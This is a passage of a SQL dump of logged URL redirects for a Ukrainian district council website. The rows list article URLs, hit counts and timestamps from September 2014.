00:00:00',301),(3109,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=892:2013-01-08-13-26-18&catid=11&lang=uk','','','',7,0,'2014-09-20 13:41:06','0000-00-00 00:00:00',301),(3110,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1337:2014-06-10-11-11-42&catid=11&lang=en&Itemid=','','','',7,0,'2014-09-20 13:44:26','0000-00-00 00:00:00',301),(3111,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1012:l-r&catid=11&lang=ru&Itemid=0','','','',3,0,'2014-09-20 13:46:26','0000-00-00 00:00:00',301),(3112,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1091:2013-09-19-12-13-07&catid=53:--25102013-&Itemid=94&lang=uk','','','',2,0,'2014-09-20 13:46:44','0000-00-00 00:00:00',301),(3113,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1121:-24-6-&catid=11&lang=uk&Itemid=0','','','',4,0,'2014-09-20 13:48:10','0000-00-00 00:00:00',301),(3114,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=961:2013-03-11-10-51-56&catid=48&Itemid=87&lang=ru','','','',2,0,'2014-09-20 13:48:47','0000-00-00 00:00:00',301),(3115,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1334:2014-06-06-05-54-20&catid=11&lang=uk&Itemid=0','','','',5,0,'2014-09-20 13:48:51','0000-00-00 00:00:00',301),(3116,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1080:-l-r&catid=53&Itemid=94&lang=ru','','','',7,0,'2014-09-20 13:49:52','0000-00-00 00:00:00',301),(3117,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=993:-21-&catid=11&lang=uk','','','',5,0,'2014-09-20 13:51:29','0000-00-00 00:00:00',301),(3118,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1100:2013-10-02-18-03-10&catid=11&lang=uk','','','',4,0,'2014-09-20 14:02:17','0000-00-00 00:00:00',301),(3119,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1173:2014-01-15-10-37-18&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',10,0,'2014-09-20 14:04:56','0000-00-00 00:00:00',301),(3120,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1142:-l-r-&catid=54&Itemid=95&lang=en','','','',5,0,'2014-09-20 14:05:02','0000-00-00 00:00:00',301),(3121,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1029:2013-06-17-06-34-51&catid=51:--19072013-&Itemid=92&lang=ru','','','',2,0,'2014-09-20 14:05:32','0000-00-00 00:00:00',301),(3122,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1226:-1996-2004-&catid=11&lang=uk&Itemid=','','','',2,0,'2014-09-20 14:06:05','0000-00-00 00:00:00',301),(3123,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1252:2014-03-24-17-19-07&catid=11&lang=uk','','','',9,0,'2014-09-20 14:06:09','0000-00-00 00:00:00',301),(3124,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=990:-2013-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',2,0,'2014-09-20 14:07:00','0000-00-00 00:00:00',301),(3125,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1137:2013-11-15-13-07-04&catid=11&lang=en','','','',2,0,'2014-09-20 14:09:31','0000-00-00 00:00:00',301),(3126,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=892:2013-01-08-13-26-18&catid=11&lang=ru','','','',1,0,'2014-09-20 14:10:52','0000-00-00 00:00:00',301),(3127,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1063:2013-08-02-17-32-04&catid=11&lang=uk&Itemid=','','','',1,0,'2014-09-20 14:11:52','0000-00-00 00:00:00',301),(3128,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1000:1&catid=11&lang=uk','','','',4,0,'2014-09-20 14:11:57','0000-00-00 00:00:00',301),(3129,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=892:2013-01-08-13-26-18&catid=11&lang=uk&Itemid=','','','',1,0,'2014-09-20 14:12:32','0000-00-00 00:00:00',301),(3130,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1057:--22072013--2100-&catid=11&lang=en&Itemid=0','','','',2,0,'2014-09-20 14:12:40','0000-00-00 00:00:00',301),(3131,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1358:2014-07-07-08-11-22&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',5,0,'2014-09-20 14:12:48','0000-00-00 00:00:00',301),(3132,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1124:2013-10-30-08-05-10&catid=11&lang=en','','','',3,0,'2014-09-20 14:12:49','0000-00-00 00:00:00',301),(3133,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1060:2013-07-27-10-13-15&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',3,0,'2014-09-20 14:12:54','0000-00-00 00:00:00',301),(3134,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=938:---------------6612-------626-&catid=47&Itemid=86&lang=en','','','',1,0,'2014-09-20 14:13:05','0000-00-00 00:00:00',301),(3135,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1080:---------------l-r&catid=36:2011-07-21-07-51-53&Itemid=70&lang=uk','','','',4,0,'2014-09-20 14:14:31','0000-00-00 00:00:00',301),(3136,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=876:2012-12-18-09-32-45&catid=46&Itemid=85&lang=uk','','','',4,0,'2014-09-20 14:14:44','0000-00-00 00:00:00',301),(3137,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1064:2013-08-09-07-52-21&catid=11&lang=en&Itemid=0','','','',2,0,'2014-09-20 14:16:02','0000-00-00 00:00:00',301),(3138,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1000:1&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',14,0,'2014-09-20 14:16:05','0000-00-00 00:00:00',301),(3139,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=944:-l-r-&catid=49:--12042013-&Itemid=88&lang=uk','','','',2,0,'2014-09-20 14:16:10','0000-00-00 00:00:00',301),(3140,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1080:---------------l-r&catid=36&Itemid=70&lang=uk','','','',7,0,'2014-09-20 14:16:11','0000-00-00 00:00:00',301),(3141,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=948:-2012-&catid=36&Itemid=70&lang=en','','','',4,0,'2014-09-20 14:17:55','0000-00-00 00:00:00',301),(3142,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1043:-2013-&catid=51&Itemid=92&lang=en','','','',2,0,'2014-09-20 14:20:15','0000-00-00 00:00:00',301),(3143,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=892:2013-01-08-13-26-18&catid=11&lang=uk&Itemid=','','','',1,0,'2014-09-20 14:21:01','0000-00-00 00:00:00',301),(3144,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1080:---------------l-r&catid=36&Itemid=70&lang=ru','','','',3,0,'2014-09-20 14:22:29','0000-00-00 00:00:00',301),(3145,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1017:-2013-&catid=11&lang=uk&Itemid=','','','',3,0,'2014-09-20 14:28:01','0000-00-00 00:00:00',301),(3146,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1228:2014-02-27-14-42-41&catid=11&Itemid=14&lang=uk','','','',19,0,'2014-09-20 14:34:46','0000-00-00 00:00:00',301),(3147,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1346:2014-06-18-11-51-53&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',14,0,'2014-09-20 14:34:53','0000-00-00 00:00:00',301),(3148,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=987:2013-04-15-06-06-41&catid=49:--12042013-&Itemid=88&lang=ru','','','',3,0,'2014-09-20 14:35:54','0000-00-00 00:00:00',301),(3149,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1137:2013-11-15-13-07-04&catid=11&lang=en&Itemid=0','','','',2,0,'2014-09-20 14:38:48','0000-00-00 00:00:00',301),(3150,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1204:2014-01-31-07-51-23&catid=36:2011-07-21-07-51-53&Itemid=70&lang=en','','','',8,0,'2014-09-20 14:43:45','0000-00-00 00:00:00',301),(3151,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=881:2012-12-21-17-06-15&catid=46:--21122012&Itemid=85&lang=uk','','','',2,0,'2014-09-20 14:45:02','0000-00-00 00:00:00',301),(3152,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1018:2013-06-06-11-22-34&catid=11&lang=en&Itemid=0','','','',2,0,'2014-09-20 14:45:53','0000-00-00 00:00:00',301),(3153,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=987:2013-04-15-06-06-41&catid=49:--12042013-&Itemid=88&lang=uk','','','',3,0,'2014-09-20 14:46:41','0000-00-00 00:00:00',301),(3154,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1137:2013-11-15-13-07-04&catid=11&lang=en&Itemid=','','','',2,0,'2014-09-20 14:47:25','0000-00-00 00:00:00',301),(3155,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=938:---------------6612-------626-&catid=47&Itemid=86&lang=ru','','','',2,0,'2014-09-20 14:48:03','0000-00-00 00:00:00',301),(3156,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1091:2013-09-19-12-13-07&catid=53&Itemid=94&lang=ru','','','',1,0,'2014-09-20 14:49:25','0000-00-00 00:00:00',301),(3157,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1018:2013-06-06-11-22-34&catid=11&lang=en&Itemid=','','','',2,0,'2014-09-20 14:52:29','0000-00-00 00:00:00',301),(3158,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1204:2014-01-31-07-51-23&catid=56:--03022014-&Itemid=97&lang=en','','','',4,0,'2014-09-20 14:53:15','0000-00-00 00:00:00',301),(3159,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1137:2013-11-15-13-07-04&catid=11&lang=en&Itemid=0','','','',2,0,'2014-09-20 14:54:18','0000-00-00 00:00:00',301),(3160,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=892:2013-01-08-13-26-18&catid=11&lang=uk&Itemid=0','','','',2,0,'2014-09-20 14:56:50','0000-00-00 00:00:00',301),(3161,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1007:-4-&catid=11&lang=en&Itemid=0','','','',5,0,'2014-09-20 15:00:05','0000-00-00 00:00:00',301),(3162,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=879:2012-12-21-17-02-01&catid=46&Itemid=85&lang=en','','','',2,0,'2014-09-20 15:01:04','0000-00-00 00:00:00',301),(3163,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=946:-l-r-2011-2015-&catid=49&Itemid=88&lang=uk','','','',8,0,'2014-09-20 15:01:19','0000-00-00 00:00:00',301),(3164,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1205:2014-01-31-07-53-03&catid=56&Itemid=97&lang=uk','','','',2,0,'2014-09-20 15:01:49','0000-00-00 00:00:00',301),(3165,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1007:-4-&catid=11&lang=en&Itemid=','','','',2,0,'2014-09-20 15:03:28','0000-00-00 00:00:00',301),(3166,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1101:2013-10-03-07-11-01&catid=11&lang=en','','','',3,0,'2014-09-20 15:10:56','0000-00-00 00:00:00',301),(3167,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1000:1&catid=11&Itemid=14&lang=ru','','','',3,0,'2014-09-20 15:12:15','0000-00-00 00:00:00',301),(3168,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1272:2014-04-09-05-15-36&catid=10:2010-06-05-13-46-44&Itemid=17&lang=en','','','',1,0,'2014-09-20 15:13:07','0000-00-00 00:00:00',301),(3169,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=938:---------------6612-------626-&catid=47:-21022013-&Itemid=86&lang=uk','','','',8,0,'2014-09-20 15:18:00','0000-00-00 00:00:00',301),(3170,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1111:2013-10-22-16-06-36&catid=11&lang=en','','','',5,0,'2014-09-20 15:21:24','0000-00-00 00:00:00',301),(3171,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1091:2013-09-19-12-13-07&catid=53:--25102013-&Itemid=94&lang=ru','','','',2,0,'2014-09-20 15:22:58','0000-00-00 00:00:00',301),(3172,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=892:2013-01-08-13-26-18&catid=11&lang=ru&Itemid=','','','',1,0,'2014-09-20 15:32:35','0000-00-00 00:00:00',301),(3173,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1205:2014-01-31-07-53-03&catid=56:--03022014-&Itemid=97&lang=ru','','','',7,0,'2014-09-20 15:33:43','0000-00-00 00:00:00',301),(3174,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1204:2014-01-31-07-51-23&catid=56&Itemid=97&lang=en','','','',3,0,'2014-09-20 15:34:22','0000-00-00 00:00:00',301),(3175,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=938:---------------6612-------626-&catid=47:-21022013-&Itemid=86&lang=ru','','','',4,0,'2014-09-20 15:36:52','0000-00-00 00:00:00',301),(3176,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=946:-l-r-2011-2015-&catid=49&Itemid=88&lang=ru','','','',1,0,'2014-09-20 15:37:48','0000-00-00 00:00:00',301),(3177,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1350:2014-06-23-07-06-24&catid=59:--20062014-&Itemid=107&lang=en','','','',10,0,'2014-09-20 15:40:56','0000-00-00 00:00:00',301),(3178,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1000:1&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',2,0,'2014-09-20 15:42:02','0000-00-00 00:00:00',301),(3179,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1379:2014-09-01-08-47-25&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',11,0,'2014-09-20 15:43:42','0000-00-00 00:00:00',301),(3180,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1007:-4-&catid=11&lang=en&Itemid=0','','','',3,0,'2014-09-20 15:48:53','0000-00-00 00:00:00',301),(3181,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1286:2014-04-23-06-48-27&catid=10&Itemid=17&lang=ru','','','',3,0,'2014-09-20 15:48:58','0000-00-00 00:00:00',301),(3182,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1239:--29----6-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',15,0,'2014-09-20 15:48:59','0000-00-00 00:00:00',301),(3183,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=987:2013-04-15-06-06-41&catid=49&Itemid=88&lang=uk','','','',5,0,'2014-09-20 15:51:43','0000-00-00 00:00:00',301),(3184,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1127:2013-11-05-12-58-04&catid=11&lang=en&Itemid=','','','',5,0,'2014-09-20 15:52:34','0000-00-00 00:00:00',301),(3185,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=6&Itemid=9&lang=en','','','',10,0,'2014-09-20 15:53:15','0000-00-00 00:00:00',301),(3186,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1000:1&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',4,0,'2014-09-20 15:55:25','0000-00-00 00:00:00',301),(3187,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1044:2013-07-05-11-26-05&catid=51:--19072013-&Itemid=92&lang=uk','','','',4,0,'2014-09-20 15:56:12','0000-00-00 00:00:00',301),(3188,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=944:-----l---r--------------&catid=36:2011-07-21-07-51-53&Itemid=70&lang=ru','','','',3,0,'2014-09-20 15:56:13','0000-00-00 00:00:00',301),(3189,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=987:2013-04-15-06-06-41&catid=49&Itemid=88&lang=ru','','','',1,0,'2014-09-20 15:56:18','0000-00-00 00:00:00',301),(3190,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&id=6:2010-06-05-12-52-17&layout=blog&Itemid=9&lang=en','','','',5,0,'2014-09-20 15:56:55','0000-00-00 00:00:00',301),(3191,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1027:-2013-2013-&catid=36:2011-07-21-07-51-53&Itemid=70&lang=en','','','',4,0,'2014-09-20 16:02:40','0000-00-00 00:00:00',301),(3192,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1062:2013-07-29-13-33-29&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',5,0,'2014-09-20 16:06:55','0000-00-00 00:00:00',301),(3193,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=946:-l-r-2011-2015-&catid=49:--12042013-&Itemid=88&lang=uk','','','',2,0,'2014-09-20 16:08:12','0000-00-00 00:00:00',301),(3194,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1205:2014-01-31-07-53-03&catid=56&Itemid=97&lang=ru','','','',3,0,'2014-09-20 16:10:36','0000-00-00 00:00:00',301),(3195,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1044:2013-07-05-11-26-05&catid=36:2011-07-21-07-51-53&Itemid=70&lang=uk','','','',6,0,'2014-09-20 16:12:40','0000-00-00 00:00:00',301),(3196,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=897:2013-01-18-07-40-55&catid=47&Itemid=86&lang=ru','','','',1,0,'2014-09-20 16:15:54','0000-00-00 00:00:00',301),(3197,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1286:2014-04-23-06-48-27&catid=10&Itemid=17&lang=uk','','','',8,0,'2014-09-20 16:17:14','0000-00-00 00:00:00',301),(3198,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=897:2013-01-18-07-40-55&catid=47&Itemid=86&lang=ru','','','',3,0,'2014-09-20 16:20:12','0000-00-00 00:00:00',301),(3199,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1127:2013-11-05-12-58-04&catid=11&lang=en&Itemid=0','','','',2,0,'2014-09-20 16:21:46','0000-00-00 00:00:00',301),(3200,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1027:-2013-2013-&catid=51&Itemid=92&lang=en','','','',3,0,'2014-09-20 16:23:46','0000-00-00 00:00:00',301),(3201,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1091:2013-09-19-12-13-07&catid=53:--25102013-&Itemid=94&lang=uk','','http://www.google.com.ua/url?sa=t&rct=j&q=%D0%BD%D0%B0%D0%B3%D0%BE%D1%80%D0%BE%D0%B4%D0%B6%D0%B5%D0%BD%D0%BD%D1%8F%20%D0%B2%D0%BE%D0%BB%D0%BE%D0%B4%D0','',12,0,'2014-09-20 16:28:55','0000-00-00 00:00:00',301),(3202,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1232:2014-03-02-14-32-43&catid=11&Itemid=14&lang=ru','','','',9,0,'2014-09-20 16:31:38','0000-00-00 00:00:00',301),(3203,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=946:-l-r-2011-2015-&catid=49:--12042013-&Itemid=88&lang=ru','','','',2,0,'2014-09-20 16:36:49','0000-00-00 00:00:00',301),(3204,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1127:2013-11-05-12-58-04&catid=11&lang=en&Itemid=','','','',2,0,'2014-09-20 16:37:17','0000-00-00 00:00:00',301),(3205,'http://www.malyn-rayrada.org.ua/modules/mod_fpss/mod_fpss/templates/JJ-Rasper/template_css.php?w=820&h=140&sw=200','','','',5,0,'2014-09-20 16:44:17','0000-00-00 00:00:00',301),(3206,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1239:--29----6-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',6,0,'2014-09-20 16:44:58','0000-00-00 00:00:00',301),(3207,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1027:-2013-2013-&catid=51:--19072013-&Itemid=92&lang=en','','','',3,0,'2014-09-20 16:46:30','0000-00-00 00:00:00',301),(3208,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1250:2014-03-24-07-04-57&catid=11&Itemid=14&lang=uk','','','',7,0,'2014-09-20 16:49:32','0000-00-00 00:00:00',301),(3209,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1186:-------2013--------i--2014--&catid=36:2011-07-21-07-51-53&Itemid=70&lang=ru','','','',7,0,'2014-09-20 16:52:01','0000-00-00 00:00:00',301),(3210,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1199:-l-r-&catid=56&Itemid=97&lang=uk','','','',5,0,'2014-09-20 16:52:39','0000-00-00 00:00:00',301),(3211,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1309:-2014-&catid=58:--30042014-&Itemid=105&lang=en','','','',3,0,'2014-09-20 16:53:22','0000-00-00 00:00:00',301),(3212,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1273:2014-04-10-06-15-24&catid=57&Itemid=98&lang=ru','','','',2,0,'2014-09-20 16:56:05','0000-00-00 00:00:00',301),(3213,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1141:2013-11-26-13-18-12&catid=54&Itemid=95&lang=en','','','',2,0,'2014-09-20 16:57:09','0000-00-00 00:00:00',301),(3214,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1375:-33-6-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',16,0,'2014-09-20 16:59:49','0000-00-00 00:00:00',301),(3215,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1239:--29----6-&catid=11&Itemid=14&lang=ru','','','',12,0,'2014-09-20 16:59:50','0000-00-00 00:00:00',301),(3216,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=908:2013-01-21-08-58-40&catid=47:--21022013-&Itemid=86&lang=uk','','','',2,0,'2014-09-20 17:00:31','0000-00-00 00:00:00',301),(3217,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1018:2013-06-06-11-22-34&catid=11&lang=en','','','',2,0,'2014-09-20 17:01:01','0000-00-00 00:00:00',301),(3218,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1377:-23-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',19,0,'2014-09-20 17:01:06','0000-00-00 00:00:00',301),(3219,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1230:l-r&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',20,0,'2014-09-20 17:04:23','0000-00-00 00:00:00',301),(3220,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1141:2013-11-26-13-18-12&catid=54:--29112013-&Itemid=95&lang=en','','','',2,0,'2014-09-20 17:05:01','0000-00-00 00:00:00',301),(3221,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1205:2014-01-31-07-53-03&catid=56:--03022014-&Itemid=97&lang=ru','','','',3,0,'2014-09-20 17:06:53','0000-00-00 00:00:00',301),(3222,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1146:2013-11-27-10-09-00&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',2,0,'2014-09-20 17:07:34','0000-00-00 00:00:00',301),(3223,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=926:2013-02-21-09-02-30&catid=47:-21022013-&Itemid=86&lang=uk','','','',2,0,'2014-09-20 17:10:57','0000-00-00 00:00:00',301),(3224,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1186:-------2013--------i--2014--&catid=36:2011-07-21-07-51-53&Itemid=70&lang=uk','','','',3,0,'2014-09-20 17:20:28','0000-00-00 00:00:00',301),(3225,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1199:-l-r-&catid=56:--03022014-&Itemid=97&lang=ru','','','',3,0,'2014-09-20 17:20:55','0000-00-00 00:00:00',301),(3226,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=897:2013-01-18-07-40-55&catid=47:-21022013-&Itemid=86&lang=uk','','','',3,0,'2014-09-20 17:25:05','0000-00-00 00:00:00',301),(3227,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1144:-lr&catid=54:--29112013-&Itemid=95&lang=ru','','','',2,0,'2014-09-20 17:25:49','0000-00-00 00:00:00',301),(3228,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=895:-2013-2017-&catid=47:-21022013-&Itemid=86&lang=uk','','','',2,0,'2014-09-20 17:27:52','0000-00-00 00:00:00',301),(3229,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1199:-l-r-&catid=56:--03022014-&Itemid=97&lang=uk','','','',4,0,'2014-09-20 17:28:09','0000-00-00 00:00:00',301),(3230,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=926:2013-02-21-09-02-30&catid=47:--21022013-&Itemid=86&lang=uk','','','',6,0,'2014-09-20 17:39:44','0000-00-00 00:00:00',301),(3231,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1273:2014-04-10-06-15-24&catid=57&Itemid=98&lang=ru','','','',3,0,'2014-09-20 17:40:38','0000-00-00 00:00:00',301),(3232,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1021:-l-r&catid=36&Itemid=70&lang=uk','','','',2,0,'2014-09-20 17:45:07','0000-00-00 00:00:00',301),(3233,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1036:2013-06-25-10-02-48&catid=11&lang=uk','','','',2,0,'2014-09-20 17:49:20','0000-00-00 00:00:00',301),(3234,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1036:2013-06-25-10-02-48&catid=11&lang=uk&Itemid=','','','',3,0,'2014-09-20 17:50:01','0000-00-00 00:00:00',301),(3235,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=897:2013-01-18-07-40-55&catid=47:-21022013-&Itemid=86&lang=ru','','','',3,0,'2014-09-20 17:56:32','0000-00-00 00:00:00',301),(3236,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1152:2013-11-28-14-58-05&catid=36:2011-07-21-07-51-53&Itemid=70&lang=ru','','','',3,0,'2014-09-20 18:00:38','0000-00-00 00:00:00',301),(3237,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1146:2013-11-27-10-09-00&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',3,0,'2014-09-20 18:00:58','0000-00-00 00:00:00',301),(3238,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1147:2013-11-28-09-57-12&catid=11&lang=uk&Itemid=0','','','',1,0,'2014-09-20 18:05:28','0000-00-00 00:00:00',301),(3239,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1324:2014-05-27-13-24-07&catid=36&Itemid=70&lang=ru','','','',5,0,'2014-09-20 18:05:33','0000-00-00 00:00:00',301),(3240,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1263:2014-03-31-14-00-08&catid=10:2010-06-05-13-46-44&Itemid=17&lang=en','','','',8,0,'2014-09-20 18:05:35','0000-00-00 00:00:00',301),(3241,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1288:2014-04-23-06-50-40&catid=10:2010-06-05-13-46-44&Itemid=17&lang=en','','','',5,0,'2014-09-20 18:05:39','0000-00-00 00:00:00',301),(3242,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1075:2013-09-06-09-25-33&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',3,0,'2014-09-20 18:05:52','0000-00-00 00:00:00',301),(3243,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1254:-1-50&catid=11&lang=ru&Itemid=0','','','',2,0,'2014-09-20 18:05:57','0000-00-00 00:00:00',301),(3244,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1198:2014-01-31-07-37-58&catid=36:2011-07-21-07-51-53&Itemid=70&lang=ru','','','',7,0,'2014-09-20 18:06:11','0000-00-00 00:00:00',301),(3245,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=960:-19-&catid=11&lang=uk&Itemid=','','','',4,0,'2014-09-20 18:08:18','0000-00-00 